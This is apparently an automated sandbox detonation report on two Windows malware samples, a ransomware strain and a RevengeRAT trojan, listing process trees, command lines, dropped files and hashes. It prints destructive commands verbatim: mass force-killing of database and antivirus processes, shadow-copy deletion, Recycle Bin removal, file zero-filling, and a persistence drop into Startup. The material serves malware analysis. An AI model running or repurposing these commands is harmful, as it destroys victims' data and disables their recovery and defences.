PID 1744 wrote to memory of 2848 N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe C:\Windows\system32\taskkill.exe
PID 1744 wrote to memory of 2904 N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe C:\Windows\system32\taskkill.exe
PID 1744 wrote to memory of 2904 N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe C:\Windows\system32\taskkill.exe
PID 1744 wrote to memory of 2904 N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe C:\Windows\system32\taskkill.exe
PID 1744 wrote to memory of 2792 N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe C:\Windows\system32\taskkill.exe
PID 1744 wrote to memory of 2792 N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe C:\Windows\system32\taskkill.exe
PID 1744 wrote to memory of 2792 N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe C:\Windows\system32\taskkill.exe
PID 1744 wrote to memory of 2748 N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe C:\Windows\system32\taskkill.exe
PID 1744 wrote to memory of 2748 N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe C:\Windows\system32\taskkill.exe
PID 1744 wrote to memory of 2748 N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe C:\Windows\system32\taskkill.exe
PID 1744 wrote to memory of 2744 N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe C:\Windows\system32\taskkill.exe
PID 1744 wrote to memory of 2744 N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe C:\Windows\system32\taskkill.exe
PID 1744 wrote to memory of 2744 N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe C:\Windows\system32\taskkill.exe
PID 1744 wrote to memory of 2764 N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe C:\Windows\system32\taskkill.exe
PID 1744 wrote to memory of 2764 N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe C:\Windows\system32\taskkill.exe
PID 1744 wrote to memory of 2764 N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe C:\Windows\system32\taskkill.exe
PID 1744 wrote to memory of 2648 N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe C:\Windows\system32\taskkill.exe
PID 1744 wrote to memory of 2648 N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe C:\Windows\system32\taskkill.exe
PID 1744 wrote to memory of 2648 N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe C:\Windows\system32\taskkill.exe
PID 1744 wrote to memory of 2212 N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe C:\Windows\system32\taskkill.exe
PID 1744 wrote to memory of 2212 N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe C:\Windows\system32\taskkill.exe
PID 1744 wrote to memory of 2212 N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe C:\Windows\system32\taskkill.exe
PID 1744 wrote to memory of 2932 N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe C:\Windows\system32\taskkill.exe
PID 1744 wrote to memory of 2932 N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe C:\Windows\system32\taskkill.exe
PID 1744 wrote to memory of 2932 N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe C:\Windows\system32\taskkill.exe
PID 1744 wrote to memory of 2800 N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe C:\Windows\system32\taskkill.exe
PID 1744 wrote to memory of 2800 N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe C:\Windows\system32\taskkill.exe
PID 1744 wrote to memory of 2800 N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe C:\Windows\system32\taskkill.exe
PID 1744 wrote to memory of 2916 N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe C:\Windows\system32\taskkill.exe
PID 1744 wrote to memory of 2916 N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe C:\Windows\system32\taskkill.exe
PID 1744 wrote to memory of 2916 N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe C:\Windows\system32\taskkill.exe
PID 1744 wrote to memory of 2676 N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe C:\Windows\system32\taskkill.exe
PID 1744 wrote to memory of 2676 N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe C:\Windows\system32\taskkill.exe
PID 1744 wrote to memory of 2676 N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe C:\Windows\system32\taskkill.exe
PID 1744 wrote to memory of 2828 N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe C:\Windows\system32\taskkill.exe
PID 1744 wrote to memory of 2828 N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe C:\Windows\system32\taskkill.exe
PID 1744 wrote to memory of 2828 N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe C:\Windows\system32\taskkill.exe
PID 1744 wrote to memory of 2668 N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe C:\Windows\system32\taskkill.exe

Processes

C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe

"C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe"

C:\Windows\system32\sc.exe

"sc.exe" config SQLTELEMETRY start= disabled

C:\Windows\system32\cmd.exe

"cmd.exe" /c rd /s /q %SYSTEMDRIVE%\$Recycle.bin

C:\Windows\system32\sc.exe

"sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled

C:\Windows\system32\sc.exe

"sc.exe" config SQLWriter start= disabled

C:\Windows\system32\sc.exe

"sc.exe" config SstpSvc start= disabled

C:\Windows\system32\taskkill.exe

"taskkill.exe" /IM mspub.exe /F

C:\Windows\system32\taskkill.exe

"taskkill.exe" /IM mydesktopqos.exe /F

C:\Windows\system32\taskkill.exe

"taskkill.exe" /IM mydesktopservice.exe /F

C:\Windows\system32\taskkill.exe

"taskkill.exe" /IM mysqld.exe /F

C:\Windows\system32\taskkill.exe

"taskkill.exe" /IM sqbcoreservice.exe /F

C:\Windows\system32\taskkill.exe

"taskkill.exe" /IM firefoxconfig.exe /F

C:\Windows\system32\taskkill.exe

"taskkill.exe" /IM agntsvc.exe /F

C:\Windows\system32\taskkill.exe

"taskkill.exe" /IM thebat.exe /F

C:\Windows\system32\taskkill.exe

"taskkill.exe" /IM steam.exe /F

C:\Windows\system32\taskkill.exe

"taskkill.exe" /IM encsvc.exe /F

C:\Windows\system32\taskkill.exe

"taskkill.exe" /IM excel.exe /F

C:\Windows\system32\taskkill.exe

"taskkill.exe" /IM CNTAoSMgr.exe /F

C:\Windows\system32\taskkill.exe

"taskkill.exe" /IM sqlwriter.exe /F

C:\Windows\system32\taskkill.exe

"taskkill.exe" /IM tbirdconfig.exe /F

C:\Windows\system32\taskkill.exe

"taskkill.exe" /IM dbeng50.exe /F

C:\Windows\system32\taskkill.exe

"taskkill.exe" /IM thebat64.exe /F

C:\Windows\system32\taskkill.exe

"taskkill.exe" /IM ocomm.exe /F

C:\Windows\system32\taskkill.exe

"taskkill.exe" /IM infopath.exe /F

C:\Windows\system32\taskkill.exe

"taskkill.exe" /IM mbamtray.exe /F

C:\Windows\system32\taskkill.exe

"taskkill.exe" /IM zoolz.exe /F

C:\Windows\system32\taskkill.exe

"taskkill.exe" IM thunderbird.exe /F

C:\Windows\system32\taskkill.exe

"taskkill.exe" /IM dbsnmp.exe /F

C:\Windows\system32\taskkill.exe

"taskkill.exe" /IM xfssvccon.exe /F

C:\Windows\system32\taskkill.exe

"taskkill.exe" /IM mspub.exe /F

C:\Windows\system32\taskkill.exe

"taskkill.exe" /IM Ntrtscan.exe /F

C:\Windows\system32\taskkill.exe

"taskkill.exe" /IM isqlplussvc.exe /F

C:\Windows\system32\taskkill.exe

"taskkill.exe" /IM onenote.exe /F

C:\Windows\system32\taskkill.exe

"taskkill.exe" /IM PccNTMon.exe /F

C:\Windows\system32\taskkill.exe

"taskkill.exe" /IM msaccess.exe /F

C:\Windows\system32\taskkill.exe

"taskkill.exe" /IM outlook.exe /F

C:\Windows\system32\taskkill.exe

"taskkill.exe" /IM tmlisten.exe /F

C:\Windows\system32\taskkill.exe

"taskkill.exe" /IM msftesql.exe /F

C:\Windows\system32\taskkill.exe

"taskkill.exe" /IM powerpnt.exe /F

C:\Windows\system32\taskkill.exe

"taskkill.exe" /IM mydesktopqos.exe /F

C:\Windows\system32\taskkill.exe

"taskkill.exe" /IM visio.exe /F

C:\Windows\system32\taskkill.exe

"taskkill.exe" /IM mydesktopservice.exe /F

C:\Windows\system32\taskkill.exe

"taskkill.exe" /IM winword.exe /F

C:\Windows\system32\taskkill.exe

"taskkill.exe" /IM mysqld-nt.exe /F

C:\Windows\system32\taskkill.exe

"taskkill.exe" /IM wordpad.exe /F

C:\Windows\system32\taskkill.exe

"taskkill.exe" /IM mysqld-opt.exe /F

C:\Windows\system32\taskkill.exe

"taskkill.exe" /IM ocautoupds.exe /F

C:\Windows\system32\taskkill.exe

"taskkill.exe" /IM ocssd.exe /F

C:\Windows\system32\taskkill.exe

"taskkill.exe" /IM oracle.exe /F

C:\Windows\system32\taskkill.exe

"taskkill.exe" /IM sqlagent.exe /F

C:\Windows\system32\taskkill.exe

"taskkill.exe" /IM sqlbrowser.exe /F

C:\Windows\system32\taskkill.exe

"taskkill.exe" /IM sqlservr.exe /F

C:\Windows\system32\taskkill.exe

"taskkill.exe" /IM synctime.exe /F

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" & Get-WmiObject Win32_Shadowcopy | ForEach-Object { $_Delete(); }

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" C:\Users\Admin\Desktop\HOW_TO_DECYPHER_FILES.txt

C:\Windows\system32\cmd.exe

"cmd.exe" /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 “%s” & Del /f /q “%s”

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" "/C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe

C:\Windows\system32\PING.EXE

ping 127.0.0.7 -n 3

C:\Windows\system32\choice.exe

choice /C Y /N /D Y /T 3

C:\Windows\system32\fsutil.exe

fsutil file setZeroData offset=0 length=524288 “%s”

Network

N/A

Files

memory/1744-0-0x000007FEF6323000-0x000007FEF6324000-memory.dmp

memory/1744-1-0x0000000001300000-0x000000000131A000-memory.dmp

memory/1744-4-0x000007FEF6320000-0x000007FEF6D0C000-memory.dmp

memory/2992-10-0x0000000001F70000-0x0000000001F78000-memory.dmp

memory/2992-9-0x000000001B690000-0x000000001B972000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 91625cc8dd98f4d0cf04456db1634abd
SHA1 33a4d51e4cfad8df50a4b022b55bad11b3e16275
SHA256 4f43b19d8550bf007dd45c5c9b60123d760b16a5437e366ce296c1d02d2da5a1
SHA512 7cffa9159716a9a29eaae977cd29bed3f0ff833c83a798c09d1544dbccd0a038b07422c448e902b3f5259db951a129c267b790345987dc7c5ad3a7652f9e519e

C:\ProgramData\Package Cache\{BF08E976-B92E-4336-B56F-2171179476C4}v14.30.30704\packages\vcRuntimeAdditional_x86\vc_runtimeAdditional_x86.msi.energy[[email protected]]

MD5 708dde05ea28546e2c109a1f0ba21ffc
SHA1 79b5ca3e89095cb920834ec93a0f8074725f5d35
SHA256 f57daf8813c1fdffdb3126e4fff4e640d97f72a7b7e103c585b364aef94bfe6e
SHA512 d17baae84c3ebf1e87ce33f03793f1b56c174de728f207574730ed6fbc295029d7e920b9595cab35c37b948323eb241a5afc8dd37be612c2bd12084ed0e04c0f

memory/1744-327-0x000007FEF6323000-0x000007FEF6324000-memory.dmp

memory/1744-351-0x000007FEF6320000-0x000007FEF6D0C000-memory.dmp

C:\ProgramData\Microsoft\Assistance\Client\1.0\es-ES\Help_MValidator.Lck.energy[[email protected]]

MD5 c274ebdba309c7da7c8cfb8677d75fdf
SHA1 8aaa180d7818cf12a794bf2b3ea7e9500d342df3
SHA256 0ef13d2ef4f8b598f25890d7e55b4f53889b2675da06487ddb5b091544e4d4c7
SHA512 3b789a8e73e22c2cb7bbb699585da3e2147d1c929bb19e83f50d1d7c3a3daf55030fe46f858b20f140d0f60c43d21d273f9b5021fb1c435812edb78f46b9a440

C:\Users\Admin\Desktop\HOW_TO_DECYPHER_FILES.txt

MD5 449e38dab5d4085d0547466e25bcd6ce
SHA1 16eabefecfa2a53ba963ace741358a03b35f0a17
SHA256 70e238dd9b9e144a717df3a5a1e1098ff2dc5733f67d82a6dc6990814dd7e110
SHA512 169d24352afd4297fada27ae0c93f600d6364123871dd2abe59cadf7cc5c0b716a3d31efbbe5e163bb898a3990b45c16387a166f6705733f2e489c2a1c6f0a3b

memory/1744-565-0x000007FEF6320000-0x000007FEF6D0C000-memory.dmp

Analysis: behavioral21

Detonation Overview

Submitted

2024-12-02 00:53

Reported

2024-12-02 00:58

Platform

win7-20240903-en

Max time kernel

149s

Max time network

155s

Command Line

"C:\Users\Admin\AppData\Local\Temp\905d572f23883f5f161f920e53473989cf7dffc16643aa759f77842e54add550.exe"

Signatures

RevengeRAT

trojan revengerat

Revengerat family

revengerat

RevengeRat Executable

stealer
Description Indicator Process Target
N/A N/A N/A N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MSO.exe C:\Windows\system32\MSSCS.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MSO.exe C:\Windows\system32\MSSCS.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Windows\system32\MSSCS.exe N/A

Uses the VBS compiler for execution

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File created C:\Windows\system32\MSSCS.exe C:\Users\Admin\AppData\Local\Temp\905d572f23883f5f161f920e53473989cf7dffc16643aa759f77842e54add550.exe N/A
File opened for modification C:\Windows\system32\MSSCS.exe C:\Users\Admin\AppData\Local\Temp\905d572f23883f5f161f920e53473989cf7dffc16643aa759f77842e54add550.exe N/A
File opened for modification C:\Windows\system32\MSSCS.exe C:\Windows\system32\MSSCS.exe N/A
File created C:\Windows\system32\MSSCS.exe C:\Windows\system32\MSSCS.exe N/A

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\905d572f23883f5f161f920e53473989cf7dffc16643aa759f77842e54add550.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\MSSCS.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1736 wrote to memory of 2476 N/A C:\Users\Admin\AppData\Local\Temp\905d572f23883f5f161f920e53473989cf7dffc16643aa759f77842e54add550.exe C:\Windows\system32\MSSCS.exe
PID 1736 wrote to memory of 2476 N/A C:\Users\Admin\AppData\Local\Temp\905d572f23883f5f161f920e53473989cf7dffc16643aa759f77842e54add550.exe C:\Windows\system32\MSSCS.exe
PID 1736 wrote to memory of 2476 N/A C:\Users\Admin\AppData\Local\Temp\905d572f23883f5f161f920e53473989cf7dffc16643aa759f77842e54add550.exe C:\Windows\system32\MSSCS.exe
PID 2476 wrote to memory of 2960 N/A C:\Windows\system32\MSSCS.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2476 wrote to memory of 2960 N/A C:\Windows\system32\MSSCS.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2476 wrote to memory of 2960 N/A C:\Windows\system32\MSSCS.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2476 wrote to memory of 2860 N/A C:\Windows\system32\MSSCS.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe
PID 2476 wrote to memory of 2860 N/A C:\Windows\system32\MSSCS.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe
PID 2476 wrote to memory of 2860 N/A C:\Windows\system32\MSSCS.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe
PID 2860 wrote to memory of 2700 N/A C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
PID 2860 wrote to memory of 2700 N/A C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
PID 2860 wrote to memory of 2700 N/A C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
PID 2476 wrote to memory of 1028 N/A C:\Windows\system32\MSSCS.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe
PID 2476 wrote to memory of 1028 N/A C:\Windows\system32\MSSCS.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe
PID 2476 wrote to memory of 1028 N/A C:\Windows\system32\MSSCS.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe
PID 1028 wrote to memory of 1960 N/A C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
PID 1028 wrote to memory of 1960 N/A C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
PID 1028 wrote to memory of 1960 N/A C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
PID 2476 wrote to memory of 2448 N/A C:\Windows\system32\MSSCS.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe
PID 2476 wrote to memory of 2448 N/A C:\Windows\system32\MSSCS.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe
PID 2476 wrote to memory of 2448 N/A C:\Windows\system32\MSSCS.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe
PID 2448 wrote to memory of 1712 N/A C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
PID 2448 wrote to memory of 1712 N/A C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
PID 2448 wrote to memory of 1712 N/A C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
PID 2476 wrote to memory of 2316 N/A C:\Windows\system32\MSSCS.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe
PID 2476 wrote to memory of 2316 N/A C:\Windows\system32\MSSCS.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe
PID 2476 wrote to memory of 2316 N/A C:\Windows\system32\MSSCS.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe
PID 2316 wrote to memory of 2584 N/A C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
PID 2316 wrote to memory of 2584 N/A C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
PID 2316 wrote to memory of 2584 N/A C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
PID 2476 wrote to memory of 448 N/A C:\Windows\system32\MSSCS.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe
PID 2476 wrote to memory of 448 N/A C:\Windows\system32\MSSCS.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe
PID 2476 wrote to memory of 448 N/A C:\Windows\system32\MSSCS.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe
PID 448 wrote to memory of 1948 N/A C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
PID 448 wrote to memory of 1948 N/A C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
PID 448 wrote to memory of 1948 N/A C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
PID 2476 wrote to memory of 344 N/A C:\Windows\system32\MSSCS.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe
PID 2476 wrote to memory of 344 N/A C:\Windows\system32\MSSCS.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe
PID 2476 wrote to memory of 344 N/A C:\Windows\system32\MSSCS.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe
PID 344 wrote to memory of 1344 N/A C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
PID 344 wrote to memory of 1344 N/A C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
PID 344 wrote to memory of 1344 N/A C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
PID 2476 wrote to memory of 1540 N/A C:\Windows\system32\MSSCS.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe
PID 2476 wrote to memory of 1540 N/A C:\Windows\system32\MSSCS.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe
PID 2476 wrote to memory of 1540 N/A C:\Windows\system32\MSSCS.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe
PID 1540 wrote to memory of 1632 N/A C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
PID 1540 wrote to memory of 1632 N/A C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
PID 1540 wrote to memory of 1632 N/A C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
PID 2476 wrote to memory of 2932 N/A C:\Windows\system32\MSSCS.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe
PID 2476 wrote to memory of 2932 N/A C:\Windows\system32\MSSCS.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe
PID 2476 wrote to memory of 2932 N/A C:\Windows\system32\MSSCS.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe
PID 2932 wrote to memory of 1804 N/A C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
PID 2932 wrote to memory of 1804 N/A C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
PID 2932 wrote to memory of 1804 N/A C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
PID 2476 wrote to memory of 844 N/A C:\Windows\system32\MSSCS.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe
PID 2476 wrote to memory of 844 N/A C:\Windows\system32\MSSCS.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe
PID 2476 wrote to memory of 844 N/A C:\Windows\system32\MSSCS.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe
PID 844 wrote to memory of 2052 N/A C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
PID 844 wrote to memory of 2052 N/A C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
PID 844 wrote to memory of 2052 N/A C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
PID 2476 wrote to memory of 552 N/A C:\Windows\system32\MSSCS.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe
PID 2476 wrote to memory of 552 N/A C:\Windows\system32\MSSCS.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe
PID 2476 wrote to memory of 552 N/A C:\Windows\system32\MSSCS.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe
PID 552 wrote to memory of 1244 N/A C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe

Processes

C:\Users\Admin\AppData\Local\Temp\905d572f23883f5f161f920e53473989cf7dffc16643aa759f77842e54add550.exe

"C:\Users\Admin\AppData\Local\Temp\905d572f23883f5f161f920e53473989cf7dffc16643aa759f77842e54add550.exe"

C:\Windows\system32\MSSCS.exe

"C:\Windows\system32\MSSCS.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -ExecutionPolicy Bypass -Command [System.Reflection.Assembly]::LoadWithPartialName('System.Windows.Forms'); [System.Windows.Forms.MessageBox]::Show('Isto abriu lol','Rekt!',0,64)

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe

"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\efzd8rp0.cmdline"

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESEF21.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcEF20.tmp"

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe

"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\vsufvra5.cmdline"

